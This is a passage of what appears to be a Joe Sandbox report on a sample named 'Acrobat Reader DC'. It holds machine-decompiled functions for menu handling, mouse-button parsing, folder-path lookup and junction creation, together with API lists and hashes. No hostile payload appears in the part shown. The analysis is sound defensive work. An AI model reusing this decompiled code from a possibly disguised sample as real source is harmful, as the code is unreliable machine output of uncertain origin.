                                  0x004727c9
                                  0x004727ce
                                  0x00000000
                                  0x00000000
                                  0x004727d9
                                  0x004727db
                                  0x004727e0
                                  0x00000000
                                  0x00000000
                                  0x00472757
                                  0x00472759
                                  0x0047275e
                                  0x00000000
                                  0x00000000
                                  0x00472769
                                  0x0047276b
                                  0x00472770
                                  0x00000000
                                  0x00000000
                                  0x0047277b
                                  0x0047277d
                                  0x00472782
                                  0x00000000
                                  0x00000000
                                  0x0047278d
                                  0x0047278f
                                  0x00472794
                                  0x00000000
                                  0x00000000
                                  0x00472c6f
                                  0x00472c6f
                                  0x00472c71
                                  0x00472c76
                                  0x00000000
                                  0x00000000
                                  0x004727eb
                                  0x004727ed
                                  0x004727f2
                                  0x00000000
                                  0x00000000
                                  0x004727fd
                                  0x004727ff
                                  0x00472804
                                  0x00000000
                                  0x00000000
                                  0x0047279f
                                  0x00000000
                                  0x00000000
                                  0x004727be
                                  0x004727a6
                                  0x004727a6
                                  0x004727a8
                                  0x00472da2
                                  0x00472da2
                                  0x00472da7
                                  0x004727ae
                                  0x004727ae
                                  0x004727b3
                                  0x004727b3
                                  0x00000000
                                  0x00000000
                                  0x0047280f
                                  0x00000000
                                  0x00000000
                                  0x0047281a
                                  0x00000000
                                  0x00000000
                                  0x00472825
                                  0x00000000
                                  0x00000000
                                  0x00472830
                                  0x00472837
                                  0x0047283c
                                  0x0047283e
                                  0x00472840
                                  0x00472845
                                  0x00000000
                                  0x00000000
                                  0x0047284c
                                  0x00472858
                                  0x00000000
                                  0x00000000
                                  0x004728cf
                                  0x00000000
                                  0x00000000
                                  0x004728d9
                                  0x004728de
                                  0x004728e2
                                  0x004728ee
                                  0x004728f2
                                  0x004728fe
                                  0x00472902
                                  0x0047290e
                                  0x00472912
                                  0x0047291e
                                  0x00472922
                                  0x0047292e
                                  0x00472932
                                  0x0047293e
                                  0x00472942
                                  0x0047295d
                                  0x00472961
                                  0x00000000
                                  0x00472963
                                  0x00472963
                                  0x00472963
                                  0x00472944
                                  0x00472944
                                  0x00472948
                                  0x0047294d
                                  0x00472953
                                  0x00472953
                                  0x0047294d
                                  0x00472934
                                  0x00472934
                                  0x00472934
                                  0x00472924
                                  0x00472924
                                  0x00472924
                                  0x00472914
                                  0x00472914
                                  0x00472914
                                  0x00472904
                                  0x00472904
                                  0x00472904
                                  0x004728f4
                                  0x004728f4
                                  0x004728f4
                                  0x004728e4
                                  0x004728e4
                                  0x004728e4
                                  0x00000000
                                  0x00000000
                                  0x00472977
                                  0x0047297c
                                  0x0047297f
                                  0x00472981
                                  0x00472986
                                  0x00000000
                                  0x00000000
                                  0x0047298d
                                  0x00472993
                                  0x00472996
                                  0x00472998
                                  0x0047299d
                                  0x004729a5
                                  0x004729a5
                                  0x004729ad
                                  0x00000000
                                  0x00000000
                                  0x004729bf
                                  0x004729c5
                                  0x004729ca
                                  0x004722be
                                  0x004722be
                                  0x00000000
                                  0x00000000
                                  0x00472863
                                  0x00472869
                                  0x0047286d
                                  0x0047286f
                                  0x00472893
                                  0x00472871
                                  0x00472871
                                  0x00472874
                                  0x00472889
                                  0x00472876
                                  0x00472876
                                  0x00472879
                                  0x0047296d
                                  0x0047296d
                                  0x0047287f
                                  0x0047287f
                                  0x0047287f
                                  0x00472879
                                  0x00472874
                                  0x00000000
                                  0x00000000
                                  0x0047289d
                                  0x0047289f
                                  0x004728a4
                                  0x004728a6
                                  0x004728a9
                                  0x004728ab
                                  0x004728ae
                                  0x004728b1
                                  0x004728b4
                                  0x004728bb
                                  0x004728c0
                                  0x004728c2
                                  0x004728c2
                                  0x004728c7
                                  0x00000000
                                  0x00000000
                                  0x00472a13
                                  0x00472a1a
                                  0x00472a20
                                  0x00000000
                                  0x00000000
                                  0x00472a37
                                  0x00472a3c
                                  0x00472a43
                                  0x00472a45
                                  0x00472a47
                                  0x00472a4f
                                  0x00472a51
                                  0x00472a5b
                                  0x00472a5b
                                  0x00472a63
                                  0x00472a66
                                  0x00472a68
                                  0x00472a6b
                                  0x00472a7c
                                  0x00472a6d
                                  0x00472a6d
                                  0x00472a72
                                  0x00472a72
                                  0x00472a84
                                  0x00472a84
                                  0x00472a84
                                  0x00472a85
                                  0x00472a8c
                                  0x00472a8d
                                  0x00472a95
                                  0x00472a95
                                  0x00472a5b
                                  0x00472a99
                                  0x00472a9b
                                  0x00472aa3
                                  0x00000000
                                  0x00000000
                                  0x00472ab3
                                  0x00472abc
                                  0x00000000
                                  0x00000000
                                  0x00472acd
                                  0x00472ad5
                                  0x00000000
                                  0x00000000
                                  0x00472add
                                  0x00472ae3
                                  0x00472aeb
                                  0x00000000
                                  0x00000000
                                  0x00472af3
                                  0x00472af9
                                  0x00472b01
                                  0x00000000
                                  0x00000000
                                  0x00472b0f
                                  0x00472b17
                                  0x00000000
                                  0x00000000
                                  0x004721e6
                                  0x004721ee
                                  0x004721f3
                                  0x004721fb
                                  0x00000000
                                  0x00000000
                                  0x00472203
                                  0x00472208
                                  0x00472210
                                  0x00472210
                                  0x00472218
                                  0x00000000
                                  0x00000000
                                  0x00472220
                                  0x00472225
                                  0x0047222d
                                  0x0047222d
                                  0x00472235
                                  0x00000000
                                  0x00000000
                                  0x00472b1f
                                  0x00472b2a
                                  0x00472b30
                                  0x00472b33
                                  0x00472b35
                                  0x00472b3a
                                  0x00000000
                                  0x00000000
                                  0x00472b41
                                  0x00472b4c
                                  0x00472b52
                                  0x00472b55
                                  0x00472b57
                                  0x00472b5c
                                  0x00000000
                                  0x00000000
                                  0x00472b69
                                  0x00472b6c
                                  0x00472b75
                                  0x00472b78
                                  0x00472b7e
                                  0x00472b80
                                  0x00472b83
                                  0x00472b88
                                  0x00472b8b
                                  0x00472b90
                                  0x00472b97
                                  0x00472b99
                                  0x00472b9f
                                  0x00472ba7
                                  0x00472ba7
                                  0x00472baf
                                  0x00000000
                                  0x00000000
                                  0x00472bb8
                                  0x00472bbb
                                  0x00472bc4
                                  0x00472bc7
                                  0x00472bcd
                                  0x00472bcf
                                  0x00472bd7
                                  0x00472bda
                                  0x00472bdf
                                  0x00472be6
                                  0x00472be8
                                  0x00472bee
                                  0x00472bf6
                                  0x00472bf6
                                  0x00472bfe
                                  0x00000000
                                  0x00000000
                                  0x00472c5c
                                  0x00472c61
                                  0x00472c64
                                  0x00000000
                                  0x00472c66
                                  0x00472c66
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472c69
                                  0x00000000
                                  0x00000000
                                  0x00472c06

                                  APIs
                                  • _memset.LIBCMT ref: 00472103
                                  • _memset.LIBCMT ref: 00472121
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FolderPath$_memset$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 645292623-986655627
                                  • Opcode ID: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                  • Opcode Fuzzy Hash: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00468B0E(void* __fp0, struct tagMENUITEMINFOW** _a4, struct HWND__* _a8, intOrPtr _a12) {
                                  				struct HMENU__* _v12;
                                  				struct tagPOINT _v20;
                                  				struct tagMENUITEMINFOW _v68;
                                  				signed int _t51;
                                  				signed int _t85;
                                  				struct HWND__* _t87;
                                  				struct HMENU__** _t88;
                                  				void* _t99;
                                  
                                  				_t99 = __fp0;
                                  				_t88 = _a4;
                                  				_v68.cbSize = 0x30;
                                  				E00412F40( &(_v68.fMask), 0, 0x2c);
                                  				_t51 = _a12 + 0xfffffe00;
                                  				_t85 = 0;
                                  				_v12 = _t88[0x274];
                                  				if(_t51 > 6) {
                                  					L20:
                                  					if((_t88[3] & _t85) == 0 ||  *0x4974eb == 0) {
                                  						L34:
                                  						return _t51;
                                  					} else {
                                  						if(_t88[1] == 0) {
                                  							DeleteMenu( *_t88, 5, 0);
                                  							DeleteMenu( *_t88, 4, 0);
                                  							DeleteMenu( *_t88, 6, 0);
                                  							DeleteMenu( *_t88, 3, 0);
                                  							_t88[2] = 0;
                                  						} else {
                                  							if(_t88[2] == 0) {
                                  								if(GetMenuItemCount( *_t88) > 0) {
                                  									_t88[0x274] = 4;
                                  									E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
                                  								}
                                  								_t88[0x274] = 3;
                                  								E0045FBAC(_t88, 0, _t88[0x1f], 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = 5;
                                  								E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = 2;
                                  								E0045FBAC(_t88, 0, _t88[0x1b], 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = _v12;
                                  								_t88[2] = 1;
                                  							}
                                  						}
                                  						_t51 = GetMenuItemCount( *_t88);
                                  						if(_t51 <= 0) {
                                  							goto L34;
                                  						} else {
                                  							if(_t88[1] != 0) {
                                  								if(_t88[1] != 0) {
                                  									 *0x4974ec = 1;
                                  									_v68.fMask = 1;
                                  									_v68.fState = 8;
                                  									SetMenuItemInfoW( *_t88, 4, 0,  &_v68);
                                  								}
                                  							} else {
                                  								_t88[1] = 0;
                                  							}
                                  							GetCursorPos( &_v20);
                                  							_t87 = _a8;
                                  							SetForegroundWindow(_t87);
                                  							TrackPopupMenuEx( *_t88, 0, _v20, _v20.y, _t87, 0);
                                  							PostMessageW(_t87, 0, 0, 0);
                                  							return E00401B80(_t88, _t99);
                                  						}
                                  					}
                                  				}
                                  				switch( *((intOrPtr*)(_t51 * 4 +  &M00468D82))) {
                                  					case 0:
                                  						__edi = 0x40;
                                  						_push(0xfffffff5);
                                  						goto L19;
                                  					case 1:
                                  						_t85 = 1;
                                  						_push(0xfffffff9);
                                  						goto L19;
                                  					case 2:
                                  						__edi = 2;
                                  						_push(0xfffffff8);
                                  						goto L19;
                                  					case 3:
                                  						__eflags =  *((char*)(__esi + 0xa));
                                  						__edi = 4;
                                  						if(__eflags == 0) {
                                  							L14:
                                  							_push(0xfffffff3);
                                  							goto L19;
                                  						}
                                  						__ebx = 7;
                                  						_v68.fMask = 1;
                                  						_v68.fState = 8;
                                  						__eflags = __ecx - 7;
                                  						if(__eflags < 0) {
                                  							goto L14;
                                  						} else {
                                  							_a4 = __esi + 0x1d0;
                                  							do {
                                  								__eax = _a4;
                                  								__eax =  *_a4;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L11;
                                  								}
                                  								__ecx =  &_v68;
                                  								__eax = GetMenuItemInfoW( *__eax, __ebx, 0, __ecx);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L11;
                                  								}
                                  								__eflags = _v68.fState & 0x00001000;
                                  								if((_v68.fState & 0x00001000) == 0) {
                                  									goto L11;
                                  								}
                                  								__eax = _a4;
                                  								__ecx =  *_a4;
                                  								__eflags = __ecx->cbSize -  *__esi;
                                  								if(__eflags == 0) {
                                  									__eax = E00453B6F(__ecx, __eflags, __esi, __ebx);
                                  									goto L14;
                                  								}
                                  								L11:
                                  								_a4 = _a4 + __edi;
                                  								__ebx = __ebx + 1;
                                  								__eflags = __ebx -  *((intOrPtr*)(__esi + 0x9d0));
                                  							} while (__eflags <= 0);
                                  							_push(0xfffffff3);
                                  							goto L19;
                                  						}
                                  					case 4:
                                  						__edi = 8;
                                  						_push(0xfffffff7);
                                  						goto L19;
                                  					case 5:
                                  						__edi = 0x10;
                                  						_push(0xfffffff6);
                                  						goto L19;
                                  					case 6:
                                  						__edi = 0x20;
                                  						_push(0xfffffff2);
                                  						L19:
                                  						_push(_t88);
                                  						_t51 = E00453B16(_t74, _t91);
                                  						goto L20;
                                  				}
                                  			}












                                  APIs
                                  • _memset.LIBCMT ref: 00468B29
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32 ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32 ref: 00468D35
                                  • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                  • String ID: 0
                                  • API String ID: 3993528054-4108050209
                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00431BE8(long _a4, WCHAR* _a8, intOrPtr _a12) {
                                  				char _v524;
                                  				char _v2068;
                                  				short _v2072;
                                  				short _v2074;
                                  				signed short _v2080;
                                  				void _v2084;
                                  				short _v2604;
                                  				long _t31;
                                  				int _t35;
                                  				signed short _t44;
                                  				int _t46;
                                  				WCHAR* _t52;
                                  				signed int _t69;
                                  				void* _t74;
                                  				void* _t77;
                                  
                                  				_t62 = _a4;
                                  				_t52 = _a8;
                                  				_t31 = GetFullPathNameW(_a4, 0x104,  &_v2604,  &_a8);
                                  				if(_t31 != 0) {
                                  					E0041329B(_t62,  &_v524, L"\\??\\%s",  &_v2604);
                                  					_t69 = E004111C1( &_v524);
                                  					if( *((short*)(_t77 + _t69 * 2 - 0x20a)) == 0x5c &&  *((short*)(_t77 + _t69 * 2 - 0x20c)) != 0x3a) {
                                  						 *((short*)(_t77 + _t69 * 2 - 0x20a)) = 0;
                                  					}
                                  					_t35 = CreateDirectoryW(_t52, 0);
                                  					if(_t35 != 0 || _a12 != _t35) {
                                  						_t74 = CreateFileW(_t52, 0x40000000, 0, 0, 3, 0x2200000, 0);
                                  						if(_t74 == 0xffffffff) {
                                  							L11:
                                  							RemoveDirectoryW(_t52);
                                  							return 0;
                                  						} else {
                                  							E00412F40( &_v2084, 0, 0x14);
                                  							_v2074 = _t69 + _t69;
                                  							_v2084 = 0xa0000003;
                                  							_v2072 = _v2074 + 2;
                                  							E00412FBA( &_v2068,  &_v524, 0x104);
                                  							_t44 = _v2074 + 0xc;
                                  							_v2080 = _t44;
                                  							_t46 = DeviceIoControl(_t74, 0x900a4,  &_v2084, (_t44 & 0x0000ffff) + 8, 0, 0,  &_a4, 0);
                                  							_push(_t74);
                                  							if(_t46 != 0) {
                                  								CloseHandle();
                                  								return 1;
                                  							} else {
                                  								CloseHandle();
                                  								goto L11;
                                  							}
                                  						}
                                  					} else {
                                  						return _t35;
                                  					}
                                  				} else {
                                  					return _t31;
                                  				}
                                  			}



















                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0044B98C(void* __edi, short* _a4) {
                                  				signed int _t8;
                                  				signed int _t10;
                                  				signed char _t14;
                                  				signed int _t17;
                                  
                                  				_t25 = _a4;
                                  				if( *_a4 == 0 || E004114AB(__edi, _t25, L"LEFT") == 0) {
                                  					return 1;
                                  				} else {
                                  					if(E004114AB(__edi, _t25, L"RIGHT") != 0) {
                                  						_t8 = E004114AB(__edi, _t25, L"MIDDLE");
                                  						__eflags = _t8;
                                  						if(_t8 != 0) {
                                  							__eflags = E004114AB(__edi, _t25, L"MAIN");
                                  							if(__eflags == 0) {
                                  								L10:
                                  								_t10 = E0040F210(__eflags);
                                  								__eflags = _t10;
                                  								_t3 = _t10 != 0;
                                  								__eflags = _t3;
                                  								_t4 = (0 | _t3) + 1; // 0x1
                                  								return _t4;
                                  							} else {
                                  								__eflags = E004114AB(__edi, _t25, L"PRIMARY");
                                  								if(__eflags == 0) {
                                  									goto L10;
                                  								} else {
                                  									__eflags = E004114AB(__edi, _t25, L"MENU");
                                  									if(__eflags == 0) {
                                  										L9:
                                  										_t14 = E0040F210(__eflags);
                                  										asm("sbb eax, eax");
                                  										_t17 =  ~(_t14 & 0x000000ff) + 2;
                                  										__eflags = _t17;
                                  										return _t17;
                                  									} else {
                                  										__eflags = E004114AB(__edi, _t25, L"SECONDARY");
                                  										if(__eflags == 0) {
                                  											goto L9;
                                  										} else {
                                  											__eflags = 0;
                                  											return 0;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							return 3;
                                  						}
                                  					} else {
                                  						return 2;
                                  					}
                                  				}
                                  			}








                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll
                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                  • API String ID: 3832890014-4202584635
                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FD57(void* __eflags, void* __fp0, signed int _a4, int _a8, int _a12) {
                                  				int _v12;
                                  				char _v16;
                                  				int _v20;
                                  				struct tagMENUITEMINFOW _v68;
                                  				struct HMENU__** _t69;
                                  				signed int _t81;
                                  				int _t82;
                                  				signed int _t85;
                                  				intOrPtr _t86;
                                  				signed int _t88;
                                  				intOrPtr _t89;
                                  				signed int _t91;
                                  				unsigned int _t99;
                                  				signed int _t100;
                                  				struct HMENU__* _t101;
                                  				int _t113;
                                  				int _t114;
                                  				int _t115;
                                  				int _t118;
                                  				int _t119;
                                  				struct HMENU__** _t120;
                                  				void* _t126;
                                  
                                  				_t126 = __fp0;
                                  				_t99 = _a8;
                                  				_t120 = _a4;
                                  				_v68.cbSize = 0x30;
                                  				E00412F40( &(_v68.fMask), 0, 0x2c);
                                  				_t102 =  &_a8;
                                  				_v68.fMask = 1;
                                  				_a8 = 0xffffffff;
                                  				if(E00434179(_t120, _t99 & 0x0000ffff,  &_a8) == 0) {
                                  					L38:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t113 = _a8;
                                  					_t69 =  *(_t120 + 0x1b4 + _t113 * 4);
                                  					if(_t113 != 3) {
                                  						__eflags = _t113 - 4;
                                  						if(_t113 != 4) {
                                  							_t100 = _t99 >> 0x10;
                                  							__eflags = _t100;
                                  							if(_t100 != 0) {
                                  								goto L38;
                                  							} else {
                                  								__eflags = _a12 - _t100;
                                  								if(_a12 != _t100) {
                                  									goto L38;
                                  								} else {
                                  									__eflags =  *0x4974ec - _t100;
                                  									if( *0x4974ec != _t100) {
                                  										goto L38;
                                  									} else {
                                  										__eflags = _t120[1];
                                  										_t101 =  *_t69;
                                  										if(_t120[1] == 0) {
                                  											L34:
                                  											__eflags = _t120[1];
                                  											if(__eflags == 0) {
                                  												goto L33;
                                  											} else {
                                  												GetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  												__eflags = _v68.fState & 0x00000008;
                                  												if((_v68.fState & 0x00000008) == 0) {
                                  													_t62 =  &(_v68.fState);
                                  													 *_t62 = _v68.fState | 0x00000008;
                                  													__eflags =  *_t62;
                                  													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  													E00453B6F( &_v68, __eflags, _t120, _t113);
                                  													return 1;
                                  												} else {
                                  													_t59 =  &(_v68.fState);
                                  													 *_t59 = _v68.fState ^ 0x00000008;
                                  													__eflags =  *_t59;
                                  													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  													E00453B6F( &_v68, __eflags, _t120, _t113);
                                  													return 1;
                                  												}
                                  											}
                                  										} else {
                                  											__eflags = _t69[1];
                                  											if(_t69[1] == 0) {
                                  												goto L34;
                                  											} else {
                                  												_a12 = 0xffffffff;
                                  												_t81 = GetMenuItemCount(_t101);
                                  												__eflags = _t120[1];
                                  												_a4 = _t81;
                                  												if(_t120[1] != 0) {
                                  													_t81 = _t81 - 4;
                                  													__eflags = _t81;
                                  													_a4 = _t81;
                                  												}
                                  												_t114 = 0;
                                  												__eflags = _t81;
                                  												if(_t81 <= 0) {
                                  													_t82 = _a12;
                                  													goto L22;
                                  												} else {
                                  													while(1) {
                                  														_t82 = GetMenuItemID(_t101, _t114);
                                  														__eflags = _t82 - _a8;
                                  														if(_t82 == _a8) {
                                  															break;
                                  														}
                                  														_t114 = _t114 + 1;
                                  														__eflags = _t114 - _a4;
                                  														if(_t114 < _a4) {
                                  															continue;
                                  														} else {
                                  															L22:
                                  															__eflags = _t82 - _a8;
                                  															if(__eflags == 0) {
                                  																break;
                                  															}
                                  														}
                                  														goto L32;
                                  													}
                                  													_v12 = _t114;
                                  													_t115 = _t114 - 1;
                                  													__eflags = _t115;
                                  													while(_t115 >= 0) {
                                  														_a12 = GetMenuItemID(_t101, _t115);
                                  														_t88 = E00434179(_t120, _t87,  &_v16);
                                  														__eflags = _t88;
                                  														if(_t88 == 0) {
                                  															goto L26;
                                  														} else {
                                  															_t89 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
                                  															__eflags =  *((char*)(_t89 + 5));
                                  															if( *((char*)(_t89 + 5)) != 0) {
                                  																goto L26;
                                  															}
                                  														}
                                  														goto L27;
                                  														L26:
                                  														_t115 = _t115 - 1;
                                  														__eflags = _t115;
                                  													}
                                  													L27:
                                  													_v20 = _t115 + 1;
                                  													_t118 = _v12 + 1;
                                  													__eflags = _t118 - _a4;
                                  													while(_t118 < _a4) {
                                  														_a12 = GetMenuItemID(_t101, _t118);
                                  														_t85 = E00434179(_t120, _t84,  &_v16);
                                  														__eflags = _t85;
                                  														if(_t85 == 0) {
                                  															goto L30;
                                  														} else {
                                  															_t86 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
                                  															__eflags =  *((char*)(_t86 + 5));
                                  															if( *((char*)(_t86 + 5)) != 0) {
                                  																goto L30;
                                  															}
                                  														}
                                  														goto L31;
                                  														L30:
                                  														_t118 = _t118 + 1;
                                  														__eflags = _t118 - _a4;
                                  													}
                                  													L31:
                                  													_t102 = _v12;
                                  													_t119 = _t118 - 1;
                                  													__eflags = _t119;
                                  													CheckMenuRadioItem(_t101, _v20, _t119, _v12, 0x400);
                                  												}
                                  												L32:
                                  												_t113 = _a8;
                                  												L33:
                                  												E00453B6F(_t102, __eflags, _t120, _t113);
                                  												return 1;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t91 = GetMenuItemInfoW( *_t120, _t113, 0,  &_v68);
                                  							__eflags = _t91;
                                  							if(_t91 == 0) {
                                  								goto L38;
                                  							} else {
                                  								__eflags = _v68.fState & 0x00000008;
